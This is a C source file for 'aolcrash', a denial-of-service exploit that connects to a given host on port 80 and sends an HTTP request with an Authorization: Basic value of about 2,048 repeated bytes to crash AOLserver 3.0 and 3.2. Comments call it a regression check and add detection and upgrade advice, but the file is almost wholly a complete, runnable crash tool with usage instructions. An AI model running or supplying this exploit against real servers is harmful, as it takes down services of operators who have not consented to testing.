/*	AOLserver will crash when a long authorization string is passed to it.
	Tested on 3.0 and 3.2, but may work on other versions too.
	3.3.1 and 3.4 are not vulnerable.
	
	gcc -o aolcrash aolcrash.c; ./aolcrash host

	exty <grumb@techemail.com> 
*/

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

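/*
 * Regression check for the AOLserver crash on an over-long
 * "Authorization: Basic" value.
 *
 * Resolves argv[1], connects to TCP port 80 and sends a single HTTP/1.0
 * request whose Authorization value is AUTH_PAD_LEN 'X' bytes.  The file
 * header reports 3.0 and 3.2 as affected and 3.3.1 and 3.4 as not
 * vulnerable, so running a fixed release is the remediation.
 *
 * For detection: the request line ends in a bare "\n" and the
 * Authorization value is about 2 KB of one repeated byte.  Credentials of
 * that size are an anomaly that a front-end proxy or IDS rule can reject
 * or flag by header length.
 *
 * Returns 0 once the request has been handed to the socket, and 1 on a
 * usage, resolution, socket, connect or send failure.
 */
int main(int argc, char *argv[])
{
	enum { AUTH_PAD_LEN = 2048 };
	static const char head[] = "GET / HTTP/1.0\nAuthorization: Basic ";
	static const char tail[] = "\r\n\r\n";
	/* 36 + 2048 + 4 bytes plus the terminating NUL fit in 2098. */
	char str[2098];
	size_t len;
	int sockfd;
	struct hostent *he;
	struct sockaddr_in their_addr;

	printf("[X] aolcrash.c by external [X]\n");
	if (argc != 2) {
		printf("usage: %s <addr>\n", argv[0]);
		return 1;
	}

	he = gethostbyname(argv[1]);
	if (he == NULL) {
		herror("gethostbyname");
		return 1;
	}
	/* Only an IPv4 result can be copied into sin_addr below. */
	if (he->h_addrtype != AF_INET ||
	    he->h_length != (int)sizeof their_addr.sin_addr) {
		fprintf(stderr, "gethostbyname: no IPv4 address for %s\n", argv[1]);
		return 1;
	}

	/* Build the request with bounded copies and track its exact length. */
	len = sizeof head - 1;
	memcpy(str, head, len);
	memset(str + len, 'X', AUTH_PAD_LEN);
	len += AUTH_PAD_LEN;
	memcpy(str + len, tail, sizeof tail);	/* includes the NUL */
	len += sizeof tail - 1;

	/* Zero the whole structure so no field is left indeterminate. */
	memset(&their_addr, 0, sizeof their_addr);
	their_addr.sin_family = AF_INET;
	their_addr.sin_port = htons(80);
	/* memcpy avoids the alignment assumption of a pointer cast. */
	memcpy(&their_addr.sin_addr, he->h_addr_list[0],
	       sizeof their_addr.sin_addr);

	sockfd = socket(AF_INET, SOCK_STREAM, 0);
	if (sockfd == -1) {
		perror("socket");
		return 1;
	}
	if (connect(sockfd, (struct sockaddr *)&their_addr,
		    sizeof their_addr) == -1) {
		perror("connect");
		close(sockfd);
		return 1;
	}
	/*
	 * Send only the bytes that were built.  The original passed the
	 * full buffer size, which also put the NUL and uninitialised stack
	 * bytes of this process on the wire.
	 */
	if (send(sockfd, str, len, 0) == -1) {
		perror("send");
		close(sockfd);
		return 1;
	}
	printf("\nexploit string sent\n");
	close(sockfd);
	return 0;
}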

